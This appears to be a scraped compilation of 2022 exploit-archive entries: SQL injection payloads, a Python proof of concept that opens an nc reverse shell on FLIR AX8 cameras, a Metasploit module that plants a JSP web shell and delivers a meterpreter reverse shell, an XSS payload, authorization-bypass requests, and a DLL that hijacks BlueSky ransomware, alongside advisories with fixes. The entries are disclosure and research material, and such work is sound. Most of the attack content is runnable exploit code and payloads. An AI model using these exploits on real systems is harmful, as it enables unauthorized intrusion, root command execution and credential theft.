<pre><code>## Title: Personnel Property Equipment-2015-2022 SQLi,<br />Unauthenticated-File-Upload<br />## Author: nu11secur1ty<br />## Date: 08.22.2022<br />## Vendor Homepage: https://www.trickcode.in/<br />## Video vendor: https://www.youtube.com/watch?v=ltSwom8sQAQ<br />## Software https://www.trickcode.in/2021/03/personnel-property-equipment-system.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/trickcode/Personnel-Property-Equipment<br /><br /><br />## Description:<br />The parameter `username` is vulnerable to SQLi boolean-based blind and<br />Unauthenticated-File-Upload.<br />The attacker can take all information from this system by using these<br />vulnerabilities.<br /><br />Status: Highly Vulnerable<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: username=eFysrSeT''' OR NOT 4417=4417 OR<br />'xXab'='cbaw&password=v9A!p7s!C0<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: username=eFysrSeT''' OR (SELECT 1050 FROM(SELECT<br />COUNT(*),CONCAT(0x7162716271,(SELECT<br />(ELT(1050=1050,1))),0x717a6a7a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR<br />'wmfc'='yfBD&password=v9A!p7s!C0<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=eFysrSeT''' AND (SELECT 4473 FROM<br />(SELECT(SLEEP(5)))Pghj) OR 'lxYt'='fefH&password=v9A!p7s!C0<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/trickcode/Personnel-Property-Equipment)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/4yavk4)<br /><br /></code></pre>
<pre><code># -*- coding: utf-8 -*-<br /><br /># Exploit Title: FLIR AX8 Unauthenticated OS Command Injection<br /># Date: 8/19/2022<br /># Exploit Author: Samy Younsi Naqwada (https://samy.link)<br /># Vendor Homepage: https://www.flir.com/<br /># Software Link: https://www.flir.com/products/ax8-automation/<br /># PoC: https://www.youtube.com/watch?v=dh0_rfAIWok<br /># Version: 1.46.16 and under.<br /># Tested on: FLIR AX8 version 1.46.16 (Ubuntu)<br /># CVE : CVE-2022-36266<br /><br />from __future__ import print_function, unicode_literals<br />from bs4 import BeautifulSoup<br />import argparse<br />import requests<br />import json<br />import urllib3<br />urllib3.disable_warnings()<br /><br />def banner():<br /> flirLogo = """ <br />███████╗██╗ ██╗██████╗ <br />██╔════╝██║ ██║██╔══██╗<br />█████╗ ██║ ██║██████╔╝<br />██╔══╝ ██║ ██║██╔══██╗<br />██║ ███████╗██║██║ ██║ <br />╚═╝ ╚══════╝╚═╝╚═╝ ╚═╝<br /> .---------------------. <br /> █████╗ ██╗ ██╗ █████╗ /--'--.------.--------/| <br />██╔══██╗╚██╗██╔╝██╔══██╗ |Say :) |__Ll__| [==] || <br />███████║ ╚███╔╝ ╚█████╔╝ |cheese!| .--. | '''' || <br />██╔══██║ ██╔██╗ ██╔══██╗ | |( () )| || <br />██║ ██║██╔╝ ██╗╚█████╔╝ | | `--` | |/ <br />╚═╝ ╚═╝╚═╝ ╚═╝ ╚════╝ `-------`------`------` <br /> <br />\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m <br />\033[1;91mFLIR AX8 Unauthenticated OS Command Injection\033[1;m <br /> FOR EDUCATIONAL PURPOSE ONLY. <br /> """<br /> return print('\033[1;94m{}\033[1;m'.format(flirLogo))<br /><br />def pingWebInterface(RHOST, RPORT):<br /> url = 'http://{}:{}/login/'.format(RHOST, RPORT)<br /> response = requests.get(url, allow_redirects=False, verify=False, timeout=60)<br /> try:<br /> if response.status_code != 200:<br /> print('[!] \033[1;91mError: FLIR AX8 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')<br /> exit()<br /> soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')<br /> version = soup.find('p', id = 'login-title').string<br /> print('[INFO] {} detected.'.format(version))<br /> except:<br /> print('[ERROR] Can\'t grab the device version...')<br /><br /><br />def execReverseShell(RHOST, RPORT, LHOST, LPORT):<br /> url = 'http://{}:{}/res.php'.format(RHOST, RPORT)<br /> payload = 'rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20{}%20{}%20%3E%2Ftmp%2Ff'.format(LHOST, LPORT)<br /> data = 'action=alarm&id=2;{}'.format(payload)<br /><br /> headers = {<br /> 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',<br /> }<br /><br /> try:<br /> print('[INFO] Executing reverse shell...')<br /> response = requests.post(url, headers=headers, data=data, allow_redirects=False, verify=False)<br /> print('Reverse shell successfully executed. {}:{}'.format(LHOST, LPORT))<br /> return<br /> except Exception as e:<br /> print('Reverse shell failed. Make sure the FLIR AX8 device can reach the host {}:{}').format(LHOST, LPORT)<br /> return False<br /><br /><br />def main():<br /> banner()<br /> args = parser.parse_args()<br /> pingWebInterface(args.RHOST, args.RPORT)<br /> execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)<br /><br /><br />if __name__ == "__main__":<br /> parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on FLIR AX8 devices.', add_help=False)<br /> parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (FLIR AX8 device)", type=str, required=True)<br /> parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)<br /> parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)<br /> parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)<br /> main()<br /></code></pre>
<pre><code># FLIR AX8 vulnerabilities.<br /><br />### Product description:<br /><br />The FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment.<br /><br />### Affected products:<br />All FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.<br /><br /><br />### Summary of the 4 vulnerabilities found / What we were able to find:<br /><br />* [CVE-2022-37061] - Unauthenticated OS Command Injection.<br /><br />FLIR AX8 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the `id` HTTP POST parameter in `res.php` endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.<br /><br />* [CVE-2022-37060] - Unauthenticated Directory Traversal.<br /><br />FLIR AX8 is affected by a directory traversal vulnerability due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains directory traversal characters, to disclose the contents of files located outside of the server's restricted path. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.<br /><br />* [CVE-2022-37062] - Improper Access Control.<br /><br />FLIR AX8 is affected by an insecure design vulnerability due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains the path of the SQLite users database, and download it. A successful exploit could allow the attacker to extract usernames and hashed passwords. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`. <br /><br />* [CVE-2022-37063] - Reflected cross-site scripting.<br /><br />FLIR AX8 is affected by a reflected cross-site scripting (XSS) vulnerability due to an improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface. A successful exploit could allow the attacker to insert malicious JavaScript code. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.<br /><br />### Step by Step Example (How to Reproduce and verify) the vulnerabilities:<br /><br />1. Unauthenticated Remote Command Injection.<br /><br />The endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the POST parameter `id` can be injected to execute any Linux command. In the example below we create a crafted query that displays the contents of the `/etc/shadow` file.<br /><br />The server returns a JSON response containing the contents of the `/etc/shadow` file. This command injection is due because there no sanitization check on the variable `$_POST["id"]`, line 65, and can therefore take advantage of the `shell_exec()` function to execute unexpected arbitrary shell commands.<br /><br />2. Unauthenticated Directory Traversal.<br /><br />The endpoint `/download.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the GET parameter `file` can be injected with a relative file paths and download any files in the system. In the example below we create a crafted query that download the contents of the `/etc/passwd` file.<br /><br />The error is due to the fact that there is no sanitization of the `$file_path` variable, line 26, when the `fopen()` function is called, line 39. However a comment in the code, line 24, and the use of the function `pathinfo()`, line 28, suggests that the developer thought about this problem and therefore created the variable `$path_parts` which is sanitized. But for some reasons the developer does not use the sanitizer variable `$path_parts` when the function `fopen()` is used. Probably an oversight.<br /><br />3. Improper Access Control.<br /><br />The endpoint `/FLIR/db/users.db` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate and let any malicious actor to download the `users.db` SQLite database.<br /><br />4. Reflected cross-site scripting.<br /><br />In the settings tab, if a file with a filename that contains JavaScript code is selected via the update firmware file input the JavaScript code will be triggered and executed. In our example, we created a file call <br /><br /><img src=x onerror=alert(String.fromCharCode(97,108,101,114,116,40,39,116,101,115,116,39,41,59));>.run<br /><br /><br />### Recommendations for how to fix the 4 vulnerabilities:<br /><br />* Vulnerability 1: The variable `$_POST["id"]`, line 65 in the file `/FLIR/usr/www/res.php`, must be sanitized using the function `intval()` and will remove any character other than integer value. `escapeshellcmd()` and `escapeshellarg()` must be also used to escapes any characters in a string that might be used to execute arbitrary commands. <br /><br />More info: <br />https://www.php.net/intval<br />https://www.php.net/manual/en/function.escapeshellcmd<br />https://www.php.net/manual/en/function.escapeshellarg<br /><br /><br />* Vulnerability 2: The variable `$file_path`, line 39 in the file `/FLIR/usr/www/download.php`, must be sanitized using the function `pathinfo()` but also use a hard coded directory path, in case you need to manage several directories set a whitelist of all allowed directories and use multiple conditions.<br /><br />More info:<br />https://www.php.net/manual/en/function.pathinfo<br /><br />* Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, in `/etc/lighttpd.conf`.<br /><br />More info:<br />https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html<br /><br />* Vulnerability 4: To protect against filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters.<br /><br />More info: <br />https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html<br /><br />### Reference:<br />https://www.flir.com/products/ax8-automation/<br /><br />### Security researchers:<br />* [Thomas Knudsen] (https://www.linkedin.com/in/thomasjknudsen)<br />* [Samy Younsi] (https://www.linkedin.com/in/samy-younsi) <br /><br /><br /><br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Transposh WordPress Translation<br />Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/<br />Type: Incorrect Authorization [CWE-863]<br />Date found: 2022-07-23<br />Date published: 2022-08-16<br />CVSSv3 Score: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)<br />CVE: CVE-2022-2536<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Transposh WordPress Translation 1.0.8.1 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Transposh translation filter for WordPress offers a unique approach to blog<br />translation. It allows your blog to combine automatic translation with human<br />translation aided by your users with an easy to use in-context interface.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />When installed, Transposh comes with a set of pre-configured options; one of these<br />is the "Who can translate" setting under the "Settings" tab. However, this option<br />is ignored if Transposh has enabled its "autotranslate" feature (it's enabled by<br />default) and the HTTP POST parameter "sr0" is larger than 0. This is caused by a<br />faulty validation in "wp/transposh_db.php":<br /><br />if (!$by && !($all_editable &&<br /> ($this->transposh->is_translator() || ($source > 0 && $this->transposh->options->enable_autotranslate)))) {<br /> tp_logger("Unauthorized translation attempt " . $_SERVER['REMOTE_ADDR'], 1);<br /> header("HTTP/1.0 401 Unauthorized translation");<br /> exit;<br />}<br /><br />Successful exploits can allow an unauthenticated attacker to bypass the Transposh<br />permissions and add translations to the WordPress site, thereby influencing what<br />is shown on the site. However, this only affects new translations.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />The following Proof-of-Concept adds a new translation<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: [host]<br />Content-Length: 74<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />User-Agent: Mozilla/5.0<br />Connection: close<br /><br />action=tp_translation&ln0=en&sr0=1&items=1&tk0=translation&tr0=translation<br /><br /><br />7. SOLUTION<br />===========<br />None. Remove the plugin to prevent exploitation.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-07-23: Discovery of the vulnerability<br />2022-07-23: CVE requested from Wordfence (CNA)<br />2022-07-25: Wordfence assigns CVE-2022-2536<br />2022-08-09: Sent note to vendor<br />2022-08-09: Vendor is aware of this bug, but there is no plan to fix it yet<br />2022-08-16: Public Disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Advantech iView NetworkServlet Command Injection',<br /> 'Description' => %q{<br /> Versions of Advantech iView software below `5.7.04.6469` are<br /> vulnerable to an unauthenticated command injection vulnerability<br /> via the `NetworkServlet` endpoint.<br /> The database backup functionality passes a user-controlled parameter,<br /> `backup_file` to the `mysqldump` command. The sanitization functionality only<br /> tests for SQL injection attempts and directory traversal, so leveraging the<br /> `-r` and `-w` `mysqldump` flags permits exploitation.<br /> The command injection vulnerability is used to write a payload on the target<br /> and achieve remote code execution as NT AUTHORITY\SYSTEM.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'rgod', # Vulnerability discovery<br /> 'y4er', # PoC<br /> 'Shelby Pace' # Metasploit module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://y4er.com/post/cve-2022-2143-advantech-iview-networkservlet-command-inject-rce/'],<br /> [ 'CVE', '2022-2143']<br /> ],<br /> 'Platform' => [ 'win' ],<br /> 'Privileged' => true,<br /> 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],<br /> 'Targets' => [<br /> [<br /> 'Windows Dropper',<br /> {<br /> 'Arch' => [ ARCH_X86, ARCH_X64 ],<br /> 'Type' => :win_dropper,<br /> 'CmdStagerFlavor' => [ 'psh_invokewebrequest', 'vbs' ],<br /> 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }<br /> }<br /> ],<br /> [<br /> 'Windows Command',<br /> {<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :win_cmd,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' }<br /> }<br /> ]<br /> ],<br /> 'DisclosureDate' => '2022-06-28',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'Reliability' => [ REPEATABLE_SESSION ],<br /> 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8080),<br /> OptString.new('TARGETURI', [ true, 'The base path to Advantech iView', '/iView3']),<br /> OptString.new('USERNAME', [ false, 'The user name to authenticate with', 'admin']),<br /> OptString.new('PASSWORD', [ false, 'The password to authenticate with', 'password'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> res = send_request_cgi!(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path)<br /> )<br /><br /> return CheckCode::Unknown('Failed to receive a response from the application') unless res<br /><br /> unless res.body.include?('iView')<br /> return CheckCode::Safe('No confirmation that target is Advantech iView')<br /> end<br /><br /> res = send_db_backup_request('')<br /> return CheckCode::Detected('Failed to receive response from backup request') unless res<br /><br /> # The patch added auth as a requirement for<br /> # accessing the NetworkServlet endpoint<br /> if res.body =~ /ERROR:\s+User\s+Not\sLogin/<br /> @needs_auth = true<br /> print_status('Vulnerability is present, though authentication is required.')<br /> end<br /><br /> CheckCode::Appears<br /> end<br /><br /> def send_db_backup_request(filename)<br /> send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'NetworkServlet'),<br /> 'keep_cookies' => true,<br /> 'vars_post' =><br /> {<br /> 'page_action_type' => 'backupDatabase',<br /> 'backup_filename' => filename<br /> }<br /> )<br /> end<br /><br /> def format_jsp<br /> bin_nums = []<br /> arg_nums = []<br /> flag_nums = []<br /><br /> bin_param.each_char { |c| bin_nums << c.ord }<br /> bin_nums = bin_nums.join(',')<br /> arg_param.each_char { |c| arg_nums << c.ord }<br /> arg_nums = arg_nums.join(',')<br /> flag_param.each_char { |c| flag_nums << c.ord }<br /> flag_nums = flag_nums.join(',')<br /><br /> '<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((' \<br /> 'new ProcessBuilder(request.getParameter(' \<br /> "new java.lang.String(new byte[]{#{bin_nums}}))," \<br /> "request.getParameter(new java.lang.String(new byte[]{#{flag_nums}}))," \<br /> "request.getParameter(new java.lang.String(new byte[]{#{arg_nums}}))).start())" \<br /> '.getInputStream()))%>'<br /> end<br /><br /> def flag_param<br /> @flag_param ||= Rex::Text.rand_text_alpha(3..8)<br /> end<br /><br /> def arg_param<br /> @arg_param ||= Rex::Text.rand_text_alpha(3..8)<br /> end<br /><br /> def bin_param<br /> @bin_param ||= Rex::Text.rand_text_alpha(3..8)<br /> end<br /><br /> def jsp_filename<br /> @jsp_filename ||= "#{Rex::Text.rand_text_alpha(5..12)}.jsp"<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, jsp_filename),<br /> 'keep_cookies' => true,<br /> 'vars_get' =><br /> {<br /> bin_param => 'cmd.exe',<br /> flag_param => '/c',<br /> arg_param => cmd<br /> }<br /> )<br /> end<br /><br /> def iview_authenticate<br /> res = send_request_cgi!(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path)<br /> )<br /><br /> fail_with(Failure::UnexpectedReply, 'Login page not found') unless res && res.body.include?('loginWindow')<br /> vprint_good('Successfully accessed the login page')<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'CommandServlet'),<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'page_action_service' => 'UserServlet',<br /> 'page_action_type' => 'login',<br /> 'user_name' => datastore['USERNAME'],<br /> 'user_password' => datastore['PASSWORD'],<br /> 'use_ldap' => 'false',<br /> 'data' => ''<br /> }<br /> )<br /><br /> unless res && res.body.include?('Success')<br /> fail_with(Failure::BadConfig, 'Authentication failed. Credentials likely incorrect.')<br /> end<br /> vprint_good('Authentication successful!')<br /> end<br /><br /> def need_auth?<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'NetworkServlet')<br /> )<br /> return false unless res<br /><br /> !!(res.body =~ /ERROR:\s+User\s+Not\sLogin/)<br /> end<br /><br /> def exploit<br /> if @needs_auth || need_auth?<br /> iview_authenticate<br /> end<br /><br /> jsp_code = format_jsp<br /><br /> sql_filename = "#{Rex::Text.rand_text_alpha(5..12)}.sql"<br /> full_cmd = "#{sql_filename}\" -r \"./webapps/iView3/#{jsp_filename}\" -w \"#{jsp_code}\""<br /><br /> res = send_db_backup_request(full_cmd)<br /> fail_with(Failure::UnexpectedReply, 'Failed to write JSP file to target') unless res<br /><br /> path = "webapps\\iView3\\#{jsp_filename}"<br /> register_file_for_cleanup(path)<br /> if target['Type'] == :win_dropper<br /> execute_cmdstager<br /> else<br /> execute_command(payload.encoded)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># Trovent Security Advisory 2110-01 #<br />#####################################<br /><br /><br />Insecure data storage in Polar Flow Android application<br />#######################################################<br /><br /><br />Overview<br />########<br /><br />Advisory ID: TRSA-2110-01<br />Advisory version: 1.0<br />Advisory status: Public<br />Advisory URL: https://trovent.io/security-advisory-2110-01<br />Affected product: Polar Flow Android mobile application (fi.polar.polarflow)<br />Affected version: 5.7.1<br />Vendor: Polar Electro, https://flow.polar.com<br />Credits: Trovent Security GmbH, Karima Hebbal<br /><br /><br />Detailed description<br />####################<br /><br />The Polar Flow app is a sports, fitness and activity analyzer which allows to plan<br />and monitor training, daily activity and sleep.<br />Trovent Security GmbH discovered that the application stores the username and<br />password in clear text in a file on the mobile device.<br /><br />Severity: Medium<br />CVSS Score: 4.4 (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)<br />CVE ID: N/A<br />CWE ID: CWE-312<br /><br /><br />Proof of concept<br />################<br /><br />Content of the file /data/data/fi.polar.polarflow/shared_prefs/UserData3.xml:<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><?xml version='1.0' encoding='utf-8' standalone='yes' ?><br /><map><br /> <string name="current_device_id">no_device</string><br /> <int name="last_version_code" value="5070103" /><br /> <string name="base_url">https://www.polarremote.com/v2/users/54871065</string><br /> <string name="last_name">Ptest</string><br /> <int name="key_initial_view_resource_id" value="2131363187" /><br /> <boolean name="valid_ver_two" value="true" /><br /> <long name="problem_phone_message_time" value="1634888249727" /><br /> <boolean name="new_blogs_available" value="true" /><br /> <string name="address_json">{"city":"\u003cscript\u003ealert(1)\u003c/script\<br />u003e","countryCode":"DE","modified":"2021-10-22T07:37:5<br />3.000Z"}</string><br /> <string name="profile_json">{"favoriteSports":[]}</string><br /> <string name="password">Test2021</string><br /> <string name="last_blog_sync_time">2021-10-22T09:37:18.309</string><br /> <long name="user_id" value="54871065" /><br /> <boolean name="initial_remote_sync_executed" value="true" /><br /> <string name="preferred_blog_language">en</string><br /> <int name="key_training_diary_tab" value="0" /><br /> <string name="first_name">Ptest</string><br /> <int name="should_show_problem_phone_message" value="2" /><br /> <string name="username">ptesttest11@gmail.com</string><br /></map><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />Solution / Workaround<br />#####################<br /><br />We recommend not to store sensitive information in clear text on the mobile<br />device.<br /><br />Fixed in version 6.3.0, verified by Trovent.<br /><br /><br />History<br />#######<br /><br />2021-10-18: Vulnerability found<br />2021-12-15: Vendor contacted<br />2022-01-20: Contacted vendor again<br />2022-01-21: Vendor replied that the vulnerability will be checked<br />2022-01-28: Vendor replied, the vulnerability will be fixed in a future update<br />2022-07-27: Vendor contacted, asking for status<br />2022-08-09: Vendor replied, the vulnerability is fixed since version 6.3.0<br />2022-08-17: Trovent verified remediation of the vulnerability<br />2022-08-18: Advisory published<br /></code></pre>
<pre><code>I found what I think is a vulnerability in the latest typeorm 0.3.7.<br />TypeORM v0.3 has a new findOneBy method instead of findOneById() and it is<br />the only way to get a record by id<br /><br />Sending undefined as a value in this method removes this parameter from the<br />query. This leads to the data exposure.<br /><br />For example:<br />Users.findOneBy({id: req.query.id}) with /?id=12345 produces SELECT * FROM<br />Users WHERE id=12345 LIMIT 1 while removing id from the query string<br />produces SELECT * FROM Users LIMIT 1<br /><br />Maintainer also does not consider this a vulnerability and stated the<br />root cause is bad input validation. I tried to contact Snyk, but they<br />took the author's position. I still think it is a major vulnerability<br /><br /><br />Vulnerable app:<br /><br /><br />import {<br /> Entity,<br /> PrimaryGeneratedColumn,<br /> Column,<br /> Connection,<br /> ConnectionOptions,<br /> Repository,<br /> createConnection<br />} from 'typeorm';<br />import express from 'express';<br />import {Application, Request, Response} from 'express';<br /><br />let connection: Connection;<br /><br />async function myListener(request: Request, response: Response) {<br /> if(!connection)<br /> connection = await createConnection(connectionOpts);<br /> const userRepo: Repository<User> = connection.getRepository(User);<br /><br /> const { email, password }: Record<string, string> = request.body;<br /> const user = await userRepo.findOneBy({ email, password });<br /> return response.json(user ? 'ok' : 'denied');<br />}<br /><br />@Entity({ name: 'Users' })<br />class User {<br /> @PrimaryGeneratedColumn()<br /> id!: number;<br /> @Column()<br /> email!: string;<br /> @Column()<br /> password!: string;<br />}<br /><br />const connectionOpts: ConnectionOptions = {<br /> type: 'mysql',<br /> name: 'myconnection',<br /> host: 'localhost',<br /> username: 'root',<br /> password: 'test123',<br /> database: 'domurl',<br /> entities: [User]<br />}<br /><br />const app: Application = express();<br />app.use(express.json());<br />app.post( "/authenticate", myListener);<br />app.listen(4444, () => console.log('App started'));<br /><br /><br />Usage:<br /><br />curl http://127.0.0.1:4444/authenticate -H 'Content-Type:<br />application/json' --data '{"email": "Flo64@yahoo.com", "password":<br />"incorrect"}'<br />"denied"⏎<br /><br /><br />Exploit:<br /><br />curl http://127.0.0.1:4444/authenticate -H 'Content-Type:<br />application/json' --data '{"email": "Flo64@yahoo.com"}'<br />"ok"⏎<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/961fa85207cdc4ef86a076bbff07a409.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Win32.Ransom.BlueSky<br />Vulnerability: Arbitrary Code Execution<br />Description: The BlueSky ransomware looks for and executes arbitrary DLLs in its current working directory. Therefore, we can hijack a vuln DLL, execute our own code, control and terminate the malware pre-encryption. The exploit dll checks if the current directory is "C:\Windows\System32", if not we grab our own process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.<br />Family: BlueSky<br />Type: PE32<br />MD5: 961fa85207cdc4ef86a076bbff07a409<br />Vuln ID: MVID-2022-0632<br />Disclosure: 08/13/2022<br />PoC Video URL: https://www.youtube.com/watch?v=osuS8GjdERM<br /><br />Exploit/PoC:<br />1) Compile the following C code as "CRYPTSP.dll" 32-bit<br />2) Place the DLL in same directory as the vuln BlueSky ransomware<br />3) Run malware<br /><br />#include "windows.h"<br /><br />//By malvuln - August 2022<br />//Purpose: PWN BlueSky ransomware MD5: 961fa85207cdc4ef86a076bbff07a409<br />//gcc -c CRYPTSP.c -m32<br />//gcc -shared -o CRYPTSP.dll CRYPTSP.o -m32<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "BlueSky Ransom\nPWNED!!! by Malvuln", "Code Exec PoC", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> if(GetCurrentDirectory(MAX_PATH, buf))<br /> if(strcmp("C:\\Windows\\System32", buf) != 0){<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr │ │ :<br />│ Website : inoutscripts.com │ │ │<br />│ Vendor : Inout Scripts │ │ │<br />│ Software : Inout RealEstate 2.1.2 │ │ Inout RealEstate is an easy, flexible │<br />│ Vuln Type: Remote SQL Injection │ │ and simple property management solution │<br />│ Method : GET │ │ ideal for business start-ups │<br />│ Impact : Database Access │ │ │<br />│ │ │ │<br />│────────────────────────────────────────────┘ └─────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise. 